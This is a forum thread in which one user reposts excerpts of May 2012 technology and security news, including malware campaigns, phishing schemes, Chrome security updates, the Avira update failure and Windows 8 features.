-0
mogs CClip 86
Expert Contributor 15th May, 2012 21:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Wikipedia warns users about malware injecting ads into its pages
The normally ad-free site says some visitors have encountered a browser-based malware infection

By Lucian Constantin
May 15, 2012 02:33 PM ET
IDG News Service - Visitors to Wikipedia who see advertisements on the site have most likely fallen victim to a browser-based malware infection, Wikimedia Foundation, the organization operating the website, said on Monday.

"We never run ads on Wikipedia," said Philippe Beaudette, director of community advocacy for the Wikimedia Foundation, in a blog post. "If you're seeing advertisements for a for-profit industry ... or anything but our fundraiser, then your web browser has likely been infected with malware."

One example of such malware is a rogue Google Chrome extension called "I want this," Beaudette said. However, similar malicious add-ons might also exist for Mozilla Firefox, Internet Explorer and other browsers, he said.

This type of malicious software is known as click fraud malware and can target multiple websites at once. In addition to injecting ads into Web pages, such rogue extensions are also known to hijack search queries in order to earn their creators affiliate revenue, said Graham Cluley, a senior technology consultant at Sophos, in a blog post Tuesday.

Read more at :-
http://www.computerworld.com/s/article/9227179/Wik...

--
Was this reply relevant?
+0
-0
mogs CClip 87
Expert Contributor 15th May, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

EU-Microsoft browser deal requires ballot screen in Windows 8
Microsoft declines to comment on its interpretation of the 2009 settlement

By Gregg Keizer
May 14, 2012 04:19 PM ET
Computerworld - Microsoft today declined to comment when asked whether it believed it's required to offer a ballot screen in Windows 8 to European users for selecting rival browsers in the new operating system's desktop mode.

In late 2009, Microsoft struck a deal with European Union (EU) antitrust regulators that required the company to display a screen in Windows providing download links to other browsers, including Mozilla's Firefox, Google's Chrome and Opera Software's Opera.

The settlement specifically called out future editions of Windows.

"For Windows Client PC Operating Systems after Windows 7, the Choice Screen update will first be made available at the general commercial release date of such an operating system and remain in place for distribution ... for the entire duration of these Commitments," the document stated.
According to the final agreement (download PDF), the deal has a five-year lifespan -- meaning it will expire in late 2014 -- and broadly defined "Windows" and "Internet Explorer" to include "successors" of the then-current Windows 7 and IE8

More at :-
http://www.computerworld.com/s/article/9227148/EU_...

--
Was this reply relevant?
+0
-0
mogs CClip 88
Expert Contributor 15th May, 2012 21:43
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome Stable Channel Update
| 08:00
Labels: Stable updates

The Google Chrome team is happy to announce the arrival of Chrome 19 to the Stable Channel for Windows, Mac, Linux and Chrome Frame. Chrome 19 contains a number of new features like tab sync. More detailed updates are available on the Chrome Blog.

Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.
[112983] Low CVE-2011-3083: Browser crash with video + FTP. Credit to Aki Helin of OUSPG.
[113496] Low CVE-2011-3084: Load links from internal pages in their own process. Credit to Brett Wilson of the Chromium development community.
[118374] Medium CVE-2011-3085: UI corruption with long autofilled values. Credit to “psaldorn”.
[$1000] [118642] High CVE-2011-3086: Use-after-free with style element. Credit to Arthur Gerkis.
[118664] Low CVE-2011-3087: Incorrect window navigation. Credit to Charlie Reis of the Chromium development community.
[$500] [120648] Medium CVE-2011-3088: Out-of-bounds read in hairline drawing. Credit to Aki Helin of OUSPG.
[$1000] [120711] High CVE-2011-3089: Use-after-free in table handling. Credit to miaubiz.
[$500] [121223] Medium CVE-2011-3090: Race condition with workers. Credit to Arthur Gerkis.
[121734] High CVE-2011-3091: Use-after-free with indexed DB. Credit to Google Chrome Security Team (Inferno).
[$1000] [122337] High CVE-2011-3092: Invalid write in v8 regex. Credit to Christian Holler.
[$500] [122585] Medium CVE-2011-3093: Out-of-bounds read in glyph handling. Credit to miaubiz.
[122586] Medium CVE-2011-3094: Out-of-bounds read in Tibetan handling. Credit to miaubiz.
[$1000] [123481] High CVE-2011-3095: Out-of-bounds write in OGG container. Credit to Hannu Heikkinen.
[Linux only] [123530] Low CVE-2011-3096: Use-after-free in GTK omnibox handling. Credit to Arthur Gerkis.
[123733] [124182] High CVE-2011-3097: Out-of-bounds write in sampled functions with PDF. Credit to Kostya Serebryany of Google and Evgeniy Stepanov of Google.
[Windows only] [124216] Low CVE-2011-3098: Bad search path for Windows Media Player plug-in. Credit to Haifei Li of Microsoft and MSVR (MSVR:159).
[124479] High CVE-2011-3099: Use-after-free in PDF with corrupt font encoding name. Credit to Mateusz Jurczyk of Google Security Team and Gynvael Coldwind of Google Security Team.
[124652] Medium CVE-2011-3100: Out-of-bounds read drawing dash paths. Credit to Google Chrome Security Team (Inferno).

And some additional rewards for issues with a wider scope than Chrome:

[Linux only] [$500] [118970] Medium CVE-2011-3101: Work around Linux Nvidia driver bug. Credit to Aki Helin of OUSPG.
[$1500] [125462] High CVE-2011-3102: Off-by-one out-of-bounds write in libxml. Credit to Jüri Aedla.

Many of the above bugs were detected using AddressSanitizer.

We’d also like to thank Aki Helin of OUSPG, Sławomir Błażek, Chamal de Silva, miaubiz, Arthur Gerkis and Christian Holler for working with us during the development cycle and preventing security regressions from ever reaching the stable channel. $9000 of additional rewards were issued for this awesomeness.


Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 89
Expert Contributor 15th May, 2012 21:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft announces Windows 8 Family Safety child monitoring feature

Parents will receive weekly activity reports via email
By Lee Bell
Tue May 15 2012, 12:44

SOFTWARE HOUSE Microsoft has announced that its Windows 8 operating system will offer weekly monitoring reports on children's online activity when it is released later this year.
In an effort to make it easier for parents to supervise their pesky children who they suspect are getting up to no good online, Microsoft said that its Family Safety feature will monitor web pages they've visited, their latest searches and their most used apps and games.
In a Building Windows 8 post on the Microsoft Developer Network blog, lead programme manager for Microsoft Phil Sohn said that the firm's Family Safety system will "monitor first", rather than focusing on filtering and software-based restrictions, as these could be difficult to set up and manage.
"The end result was that many parents abandoned family safety products and returned to in-person supervision only - a tactic that has become less effective as computers have gotten more mobile," he said.

More at :-
http://www.theinquirer.net/inquirer/news/2174805/m...

--
Was this reply relevant?
+0
-0
mogs CClip 90
Expert Contributor 15th May, 2012 21:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Multiple Human Rights, Foreign Policy Sites Hacked

A rash of recent and ongoing targeted attacks involving compromises at high-profile Web sites should serve as a sobering reminder of the need to be vigilant about applying browser updates. Hackers have hit a number of prominent foreign policy and human rights group Web sites, configuring them to serve spyware by exploiting newly patched flaws in widely used software from Adobe and Oracle.

The latest reports of this apparent cyberspy activity come from security experts at Shadowserver.org, a nonprofit that tracks malware attacks typically associated with so-called “advanced persistent threat” (APT) actors. APT is a controversial term that means many things to different folks, but even detractors of the acronym’s overuse acknowledge that it has become a useful shorthand for “We’re pretty sure it came from China.”
A diagram depicting the (since-cleaned) attack on the Website of the Center for Defense Information.
One look at the list of the sites found to be currently serving an exploit to attack a newly-patched Adobe Flash Player vulnerability (CVE-2012-0779) shows how that shorthand is earned. Shadowserver uncovered Flash exploits waiting for visitors of the Web sites for Amnesty International Hong Kong and the Center for Defense Information, a Washington, D.C. think-tank. The home page for the International Institute for Counter-Terrorism was found to be serving up malware via a recent Oracle Java vulnerability (CVE-2012-0507), while the Cambodian Ministry of Foreign Affairs site was pointing to both Flash and Java exploits.

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
Was this reply relevant?
+0
-0
mogs CClip 91
Expert Contributor 16th May, 2012 07:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, May 15, 2012 | 17:15
Labels: Dev updates
The Dev channel has been updated to 20.0.1132.8 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to V8 (3.10.8.5) and several other fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 92
Expert Contributor 16th May, 2012 08:23
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Zeus variant tricks Facebook users into exposing card data
New Zeus version injects rogue debit card-related offers into popular websites

By Lucian Constantin
May 15, 2012 04:17 PM ET
IDG News Service - A new variant of the Zeus trojan tricks users into exposing their debit card details by displaying rogue offers when they visit Facebook, Gmail, Yahoo and Hotmail, according to researchers from security firm Trusteer.

"We've recently discovered a series of attacks being carried out by a P2P [peer-to-peer] variant of the Zeus platform against some of the Internet's leading online services and websites," Trusteer CTO Amit Klein said in a blog post Tuesday. "The attacks are targeting users of Facebook, Google Mail, Hotmail and Yahoo -- offering rebates and new security measures."

Like most financial malware, Zeus has the ability to inject malicious content into browsing sessions. This functionality is commonly used to display rogue Web forms when users visit online banking websites.

Read more at :-
http://www.computerworld.com/s/article/9227186/Zeu...

--
Was this reply relevant?
+0
-0
mogs CClip 93
Expert Contributor 16th May, 2012 08:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

EU to 'remain vigilant' on Microsoft's browser commitments
However, it's unclear if a 2009 competition agreement with Microsoft extends to tablets

By Loek Essers
May 15, 2012 05:34 PM ET
IDG News Service - Regulators in Europe said Tuesday they will watch closely to make sure Microsoft complies with its commitments to ensure competition in the browser market, after Mozilla complained its Firefox browser is being excluded from Windows RT.

However, the European Commission noted that an agreement it struck with Microsoft in 2009 to regulate its behavior applied only to "client PCs," and it wasn't immediately clear if that incudes tablets, one of the main targets for Windows RT.

Mozilla protested last week that Windows RT, the version of Windows 8 for devices that use ARM processors, restricts choice and might violate an agreement Microsoft struck with the Commission to resolve an antitrust probe of the company.

Windows RT grants full access only to Internet Explorer (IE) and effectively blocks other browsers from accessing important functions, according to Mozilla. Its complaint was backed by Google, which makes the Chrome browser.

More at :-
http://www.computerworld.com/s/article/9227185/EU_...

--
Was this reply relevant?
+0
-0
mogs CClip 94
Expert Contributor 16th May, 2012 08:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 16th May, 2012 08:37
Avira antivirus upgrade wreaks 'catastrophic' havoc on Windows PCs
Service pack bricks machines by blocking boots, banning launch of virtually every Windows executable

By Gregg Keizer
May 15, 2012 03:54 PM ET
Computerworld - German security firm Avira yesterday issued a service pack for its antivirus software that crippled an unknown number of Windows machines, with one customer calling the gaffe "catastrophic" to his company.

Today, Avira updated the software to sidestep the problem.

"Following the release of Service Pack 0 (SP0) for Avira Version 2012, the ProActiv feature blocked legitimate Windows applications on customers' PCs," Avira acknowledged on its support site. "We deeply regret any difficulties this has caused you."

Avira is the world's second-biggest antivirus maker, according to usage statistics.

More at :-
http://www.computerworld.com/s/article/9227182/Avi...

Oops! Avira Anti-Virus Update Disables Windows PCs

A recent update detected almost every executable file as malware.

By Jeff Goldman | May 15, 2012

A recent Avira anti-virus update, downloaded by millions of users, effectively disabled users' Windows XP, Windows Vista and Windows 7 computers.

"The update bumps the software version to 8.2.10.64 and the definitions file to 7.11.30.24, writes ZDNet's Emil Protalinski. "The result is that the AntiVirProActiv component starts detecting critical processes as malware ... Avira sometimes kills them and stops Windows from booting, but that’s not the end of it. The update is also blocking other Microsoft software (such as Microsoft Office and Microsoft Works) as well as various third-party applications, including Byki 4 Express, Documents To Go, Garmin, Google Talk, iPod and Palm services, Opera, OpenDNS Updater, Polipo, Shadow, Stickies, and many others. In other words, almost every executable file is being falsely detected by this update."

"On the Avira forum, an employee of a company which runs Avira on one hundred computers complains that, 'This update has been pretty catastrophic. The whole company ground to a standstill,'" The H Security reports.

The company has since released an update that addresses the issue, stating, "We deeply regret any difficulties this has caused you. Thank you for your patience and understanding."

"The inadvertent blocking impacted Avira Professional Security, Avira Internet Security 2012 and Avira Antivirus Premium 2012, paid products priced between $30 and $60," writes Computerworld's Gregg Keizer. "Avira's free antivirus software, which has limited functionality -- and does not include ProActiv -- was not affected."

http://www.esecurityplanet.com/windows-security/oo...

--
Was this reply relevant?
+0
-0
mogs CClip 95
Expert Contributor 16th May, 2012 08:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Apple issues security update for QuickTime Apple has released a major security update for the Windows versions of its QuickTime media player.
The company said that the QuickTime 7.7.2 update would address some 17 security vulnerabilities in QuickTime for Windows 7, Vista and Windows XP SP2 or later.
Among the issues addressed in the update are flaws which could allow an attacker to remotely execute code on a target system. Among the vulnerable QuickTime components are tools which handle movie files, MP4 content, and web pages.
Each of the flaws can be triggered by tricking a user into viewing a specially-crafted media file or web page.
Much of the credit for the research was given to HP's TippingPoint security initiative. Apple cited researchers affiliated with the program in discovering 14 of the 17 patched security issues.
For users running the OS X version of QuickTime, Apple's release should cause little to no new concern. Many of the listed vulnerabilities were not applicable to OS X, while a number of others were addressed in Apple's recent OS X Lion 10.7.3 release and OS X10.6 security update.
Users can obtain the security update through Apple's Software Update tool or by downloading the latest version of QuickTime from the comp

Read more at :-
http://www.v3.co.uk/v3-uk/news/2174999/apple-issue...

--
Was this reply relevant?
+0
-0
mogs CClip 96
Expert Contributor 16th May, 2012 12:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

May 16th, 2012, 09:02 GMT · By Eduard Kovacs
Fake Google Chrome Installer Pushes Shady Bank Sites

Google Chrome is a popular browser that’s currently utilized by millions of people worldwide, but users should be careful because not all “ChromeSetup.exe” files are genuine.

Security researchers from Trend Micro have found that the cybercriminals that serve fake Chrome installer files use a clever technique to make everything look as legitimate as possible.

The unsuspecting user is presented with a download link that apparently points to URLs such as:
- br.msn.com/ChromeSetup.exe;
- facebook.com.br/ChromeSetup.exe;
- google.com.br/ChromeSetup.exe;
- terra.com.br/ChromeSetup.exe.

While it may seem that the installer is hosted on legitimate domains, in reality the downloads are redirected to different IPs than the ones of MSN, Facebook, Google, or Terra. Experts have noticed that most of the users who access the links are from Brazil and Peru.

Further analysis of this threat has revealed that the “ChromeSetup.exe” file is actually a piece of malware identified as TSPY_BANKER.EUIQ.

Once it finds itself on a system, the malicious element starts sending information gathered from the device to its command and control server.

TSPY_BANKER.EUIQ also downloads a configuration file and the fun begins. From this point on, each time the victim tries to access a bank website, the malware will step in and redirect the session to a phony bank site.

First, a pop-up notifies the users that security software is being loaded, after which, Internet Explorer is opened and the fake website is loaded.

Furthermore, since some banks offer legitimate fraud protection software to their customers, such as the GbPlugin from a Brazilian bank, the malware authors have integrated a component called TROJ_KILSRV.EUIQ which uninstalls such applications.

Experts believe that this particular malware is still in development, and they don’t rule out the possibility of improved versions being launched in the future.

The most interesting thing about the Banker is the fact that it somehow manages to redirect users from Facebook and Google to the IPs controlled by the cybercriminals. Trend Micro hasn't figured out how they can pull this off.

Fortunately for internauts, modern-day security solutions possess the ability to identify threats simply by analyzing their actions, which is why we must highlight again the importance of an antivirus application. Make sure you have one and keep it updated at all times.

http://news.softpedia.com/news/Fake-Google-Chrome-...

--
Was this reply relevant?
+0
-0
mogs CClip 97
Expert Contributor 16th May, 2012 19:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

ICO website hit by DDoS attack
Anonymous unconfirmed as source of breach
By Anh Nguyen | Computerworld UK | 16 May 12

The Information Commissioner's Office (ICO) website has been taken offline following a suspected distributed denial of service (DDoS) attack.

The public-facing website does not contain any sensitive information, the information watchdog said.

"Access to the ICO website has been disrupted over the past few days. We believe this is due to a distributed denial of service attack," a spokesperson for the ICO said.

"The website itself has not been damaged, but people have been unable to access it."

He added: "We regret this disruption to our service and we are working to try to bring the website back online as soon as possible."

Despite a number of reports online claiming that a group with links to the Anonymous hacktivist collective is behind the attack, over what it believes is corruption in the Leveson inquiry into press standards, the ICO spokesperson said that this could not be confirmed

More at :-
http://www.pcadvisor.co.uk/news/security/3357911/i...

--
Was this reply relevant?
+0
-0
mogs CClip 98
Expert Contributor 16th May, 2012 22:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 16th May, 2012 22:20
Google searches get smarter (Update)
May 16, 2012 by Glenn Chapman
Google on Wednesday began making its search engine smarter, in what the Internet giant called a major upgrade that looks beyond query words to figure out what people are actually seeking online.
"Knowledge Graph" technology built to recognize people, places or things signified by keywords took its fledgling steps in the United States with the hope of eventually extending it to Google searches worldwide.
"The Knowledge Graph is built to understand real things in the world," said Google fellow Ben Gomes, who has worked on search at the California-based company for more than a decade.
"It is the beginning of a long journey we will be on to cover more topics and more complex queries."
Gomes envisions Google search being able to eventually answer tricky questions such as where to attend an outdoor Lady Gaga concert in warm weather or the location of an amusement park near a vegetarian restaurant.
For now, people using US Google search in English will start seeing on search pages boxes suggesting what they are interested in finding.
A demonstration showed that searching on the word "Kings" in California, for example, prompted the search engine to point out that one is likely interested in a hockey team, basketball team, or film.
Using the keyword "Andromeda" prompted Knowledge Graph to note one might be interested in a galaxy, a television series, or a Swedish rock band.
Clicking on a suggested topic instantly refined search results.

Read more at :-
http://phys.org/news/2012-05-google-smarter.html

--
Was this reply relevant?
+0
-0
mogs CClip 99
Expert Contributor 17th May, 2012 19:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 17th May, 2012 19:39
UK-based hacking doubled in first quarter of 2012
The number of cyber attacks stemming from the UK doubled during the first three months of the year, making it the seventh biggest source of online attacks in the world.
The UK is now responsible for 2.4 per cent of global cyber attacks, according to a new report from security firm NCC Group.
The sharp rise came as a shock to NCC technical director Paul Vlissidis.
"We we surprised by the variation in numbers. It's not easy to know why, I don't think the UK has been invaded by a horde of cyber criminal gangs over the last three months," Vlissidis told V3.
"Still, it's not too surprising that cybercrime is common in the UK. It's one of the most online, connected and educated societies in the world, so it makes sense that it would house a lot of cyber criminals."
NCC's quarterly Origin of Hacks report also revealed a marked increase in the number of attacks stemming from Russia. There, the number of attacks increased by 12 per cent over the quarter, making it the third biggest hacker hotbed in the world.

More at :-
http://www.v3.co.uk/v3-uk/news/2175520/uk-hacking-...

--
Was this reply relevant?
+0
-0
mogs CClip 100
Expert Contributor 17th May, 2012 19:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
CyberZeist Finds XSS on Intel.com and Baidu.com

A hacker known as CyberZeist has found that the website of Baidu, the largest search engine in China, and one of Intel, the world renowned semiconductor chip maker, contain cross-site scripting (XSS) vulnerabilities.

We have explained the risks posed by such security holes numerous times, so this time we’ve let the hacker himself detail the dangers that lie behind apparently simple flaws.

“These two XSS are known as Non-Persistent XSS flaws. Though they have low risk factor, but if they are unresolved, this security hole could help a remote attacker to steal accounts by cookie-hijacking,” CyberZeist said.

More at :-
http://news.softpedia.com/news/CyberZeist-Finds-XS...

--
Was this reply relevant?
+0
-0
mogs CClip 101
Expert Contributor 17th May, 2012 19:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Worm Uses Facebook PMs and Instant Messaging Apps to Spread

Social media platforms and popular instant messaging (IM) apps are great mediums for cybercriminals to spread their malicious elements. Trend Micro experts provide a great example of a worm that’s making its way to computers using such methods.

The researchers report that the piece of malware, identified as Worm_Steckct.evl, is distributed via a link that’s sent in private messages on Facebook and IM programs.

The shortened links contained in the posts point to an archive called “May09- Picture18.JPG_ www.facebook.com.zip” which hides a file named “May09-Picture18.JPG _www.facebook.com.” The .com extension reveals that in fact this is an executable file.

Once it’s run, the worm steps into play and terminates all the processes and services created by security software, thus ensuring that antivirus applications cannot disrupt its evildoings.

Steckct.evl then downloads another worm, detected as Worm_Eboom.ac, which monitors the victim’s browsing sessions.

The worrying part is that it doesn’t only log the posts and private messages the customer creates or deletes on Facebook, MySpace, Twitter, WordPress, or Meebo, but it can also spread by utilizing the user’s active session on these sites.

More at :-
http://news.softpedia.com/news/Worm-Uses-Facebook-...

--
Was this reply relevant?
+0
-0
mogs CClip 102
Expert Contributor 17th May, 2012 19:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Vixie warns: DNS Changer ‘blackouts’ inevitable

Father of BIND fears ISP crisis in July
By Team Register

Posted in Security, 17th May 2012 00:36 GMT
Ridding the world of the DNS Changer is proving a long, slow process that won’t be accomplished by July 9, when the court orders granted to the FBI expire and infected users suffer their inevitable blackout.

That’s the bleak warning given by BIND father and ISC founder and chair Paul Vixie to the AusCERT security conference on the Gold Coast today, 17 May.

“Remediation, which has not worked, has taken many forms, which did not work,” Vixie drily noted.

The notorious “operation ghost click” is well-known and understood, having been analysed in the six months since arrest of the Estonians (Vladimir Tsatsin, Timur Gerassimenko, Dmitri Jegorov, Valeri Aleksejev, Konstantin Poltev and Anton Ivanov) who hosted their ad-redirecting DNS on Rove Digital’s infrastructure.

Vixie said ISC’s ongoing research demonstrates that when the court order expires, there will still be in the vicinity of 300,000 DNS Changer-infected computers, in spite of the best efforts at remediation. Many users, Vixie said, are so untrusting and hostile that they resent being told they have a problem.

More at :-
http://www.theregister.co.uk/2012/05/17/dns_change...

--
Was this reply relevant?
+0
-0
mogs CClip 103
Expert Contributor 21st May, 2012 21:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome trumps IE as world's top browser
StatCounter says Google's browser edged Microsoft's for the week's No. 1 spot; Chrome on pace to take May, too

By Gregg Keizer
May 21, 2012 12:59 PM ET
Computerworld - Google's Chrome edged past Microsoft's Internet Explorer (IE) last week to become the world's most widely-used browser, according to data from an Irish metric firm.

Chrome's average usage share for the week of May 14-20 was 32.8%, said StatCounter, an analytics company that tracks browser and operating system trends. For the same week, IE's share was 31.9%.

Although Chrome has beaten IE in StatCounter's tally before -- a day here, another there, this was the first time that Google's browser took the top spot for an entire week.

Mozilla's Firefox placed third with a share of 25.5%, while Apple's Safari and Opera Software's Opera brought up the rear with 7.1% and 1.7%, respectively

Chrome and IE are locked in a dead heat so far this month, separated by only five-hundredths of a percentage point through Sunday. The trend, however, is in Chrome's favor: It came within a whisker of beating IE the week of May 7-13, and early Monday it led Microsoft's browser 31.9% to 31.5%.

More at :-
http://www.computerworld.com/s/article/9227341/Chr...

--
Was this reply relevant?
+0
-0
mogs CClip 104
Expert Contributor 21st May, 2012 21:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Cross-browser worm spreads via Facebook, security experts warn
Malware writers use Crossrider browser extension development framework to build Facebook worm

By Lucian Constantin | 21 May 12
Malware writers have used Crossrider, a cross-browser extension development framework, to build a click-fraud worm that spreads on Facebook, security researchers from antivirus firm Kaspersky Lab said on Monday.

Crossrider is a legitimate Javascript framework that implements a unified API (application programming interface) for building Mozilla Firefox, Google Chrome and Internet Explorer extensions.

The API allows developers to write code that will run inside different browsers and, by extension, on different OSes. The framework is still in beta testing and its creators plan on adding support for Safari soon.

"It is quite rare to analyze a malicious file written in the form of a cross-platform browser plugin. It is, however, even rarer to come across plugins created using cross-browser engines," said Kaspersky Lab malware expert Sergey Golovanov in a blog post on Monday.

Read more at :-
http://www.pcadvisor.co.uk/news/security/3359080/c...

--
Was this reply relevant?
+0
-0
mogs CClip 105
Expert Contributor 21st May, 2012 21:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Twitter Tweaks Privacy Policy, Adds Custom Digests
The microblogging site offers more information on its data collection habits and promises to support Do Not Track.

By John P. Mello Jr. | PC World | 21 May 12
In an e-mail Sunday, Twitter is alerting its members to changes to its policies on privacy and service usage, including support for Do Not Track, as well as informing them about a new weekly digest of interesting news and items from their feeds.

"New things are always happening here at Twitter HQ," the e-mail says. "We're growing at a rapid pace, and our commitment to simplicity, transparency, and reaching every person on the planet continues."

In the service's privacy policy, it's offering more detail -- in plain English -- about what information it collects. Not only does it collect information when you register with Twitter, but also profile information you post to your account.

Read more: http://www.pcadvisor.co.uk/news/security/3358906/t...

--
Was this reply relevant?
+0
-0
mogs CClip 106
Expert Contributor 21st May, 2012 21:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 Security: What's New
Windows 8 is a major OS overhaul, but some of the most important additions might be the ones you can't see. Here's a look at Windows 8's new security tools and features.
By Eric Geier, PCWorld When Windows 8 comes out later this year, the new Start screen and Metro-style apps will likely be the first changes you'll notice, but those aren't the only things that are new. Microsoft is also making some serious security enhancements to help keep your system safer and to improve Windows' ability to combat viruses and malware. It just may be the biggest improvement to Windows security yet.

Antivirus Comes Preinstalled
For the first time in the history of Windows, you’ll enjoy protection from viruses, spyware, Trojan horses, rootkits, and other malware from the very first day you turn on your Windows PC--without spending a cent. Windows 8 comes with an updated version of Windows Defender that includes traditional antivirus functions in addition to the spyware protection and other security features that it has offered since Windows Vista. Windows Defender now provides similar protection--and a similar look and feel--to that of the free Microsoft Security Essentials antivirus program, which Microsoft has offered to users as an optional download since 2009.

Read more at :-
http://www.pcworld.com/article/255776/windows_8_se...

--
Was this reply relevant?
+0
-0
mogs CClip 107
Expert Contributor 21st May, 2012 22:08
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
American Express Card Emails Point to Blackhole Infested Website

Emails apparently originating from American Express have been landing in inboxes, asking recipients to verify their user IDs and reset their passwords. In reality, the notifications are part of a scheme designed to trick users into visiting a website on which the Blackhole exploit kit is hosted.

Usually when we think about malicious emails from financial institutions, we picture a shady form that requests credit card information and other private data. However, as we see in this particular scenario, security-themed alerts can be just as effective in serving malware.

“Did you recently verify your User ID or reset the password that you use to manage your American Express? Card account online? If so, you can disregard this email. To help protect your identity online, we wanted to be sure that you had made this request,” reads the email.

“If not, please click here, or log on to [Link] so we can protect your account from potential fraud. Thank you for your Cardmembership,” it continues.

Internauts who make the mistake of clicking on the link are taken to a site on which a “Please wait page is loading” alert is displayed. While the page is apparently being fetched, the victim is redirected to another domain that hosts the infamous exploit kit.

More at :-
http://news.softpedia.com/news/American-Express-Ca...

--
Was this reply relevant?
+0
-0
mogs CClip 108
Expert Contributor 22nd May, 2012 10:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Monday, May 21, 2012 | 17:29
Labels: Dev updates
The Dev channel has been updated to 21.0.1145.0 for Windows, Mac and Linux platforms

All
Updated V8 - 3.11.3.0
Allow certain unused renderer processes to exit before the tab is closed. (Issue: 126333)
Fix password autofill to work again for Incognito windows (Issue: 117720)
Prevent an infinite loop inside SSLClientSocketNSS::OnSendComplete. This has been observed in Chrome OS, but could also happen on other platforms. (Issue: 127822)
Known Issues
In bookmark bubble unable to edit the name and select the sub folder from drop down (Issue: 128612)
More details about additional changes are available in the svn log of all revisions.

You can find out about getting on the Dev channel here: http://dev.chromium.org/getting-involved/dev-chann...

If you find new issues, please let us know by filing a bug at http://code.google.com/p/chromium/issues/entry

Karen Grunberg
Google Chrome

--
Was this reply relevant?
+0
-0
mogs CClip 109
Expert Contributor 22nd May, 2012 12:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
New Tumblr Phishing Scheme Uses Old Login Page

Tumblr users are advised to be careful who they become friends with and what links they click on, especially if they’re posted by a customer whose only messages read “follow me, I follow back.”

That’s exactly how the latest Tumblr phishing campaign begins. A shady user starts following random individuals, urging them to visit a link, GFI’s Jovi Umawing reports.

In the scenario presented by the expert, the link looks like wild-atrocisity.tumblr.com. This URL actually hides an IP address from which users are redirected to a webpage that replicates the Tumblr login page.

At this point, potential victims may believe that they were somehow signed out and they might enter their usernames and passwords. By doing so, they’re actually handing over their login credentials to the masterminds that run the malicious page.

However, there’s one major clue that hints to the fact that this is nothing but a scam. The phishing site actually replicates the old Tumblr login page, not the new and more secure one.

More at :-
http://news.softpedia.com/news/New-Tumblr-Phishing...

--
Was this reply relevant?
+0
-0
mogs CClip 110
Expert Contributor 22nd May, 2012 12:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft admits Windows 8 redesign a ‘bet on the future of computing’
by Dan Worth Microsoft has admitted its Windows 8 redesign is a "bet on the future of computing" in a detailed insight into the thought processes behind the drastic revamp of its operating system.
In a blog post Windows president Steven Sinofsky said the system had been developed around several converging computing trends, including touch, the use of applications and the demand for instant information from users of web-connected devices.
"The new Windows 8 user experience is no less than a bet on the future of computing, and stakes a claim to Windows' role in that future," he said.
"We tried to break new ground in imagining how using a PC might become a fluid and enjoyable experience, how apps might work together to simplify the tasks you do every day, and how a single screen could bring together everything into one always up-to-date place."
Sinofsky said that the rising demand for touch-based devices was a huge new area that the Windows 8 system can meet.
"For an increasingly large number of people over time, it will be the primary way they interact with Windows. And for the vast majority of users, it will eventually be used alongside mouse and keyboard to complete their experience," he said.
Sinofsky also acknowledged that feedback to the Consumer Preview version of the operating system launched earlier this year had been mixed. However, he said the purpose of the launch had been to listen to user feedback and the firm was confident that overtime users would adapt to the new platform.

More at :-
http://www.v3.co.uk/v3-uk/news/2178429/microsoft-a...

--
Was this reply relevant?
+0
-0
mogs CClip 111
Expert Contributor 22nd May, 2012 12:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft service makes research a social affair
May 22, 2012
An "experimental" project by Microsoft to mix online social networking and academic research was open to the public on Monday.
The Redmond, Washington-based software colossus invited anyone to join its Internet community at so.cl, which was pronounced "social."
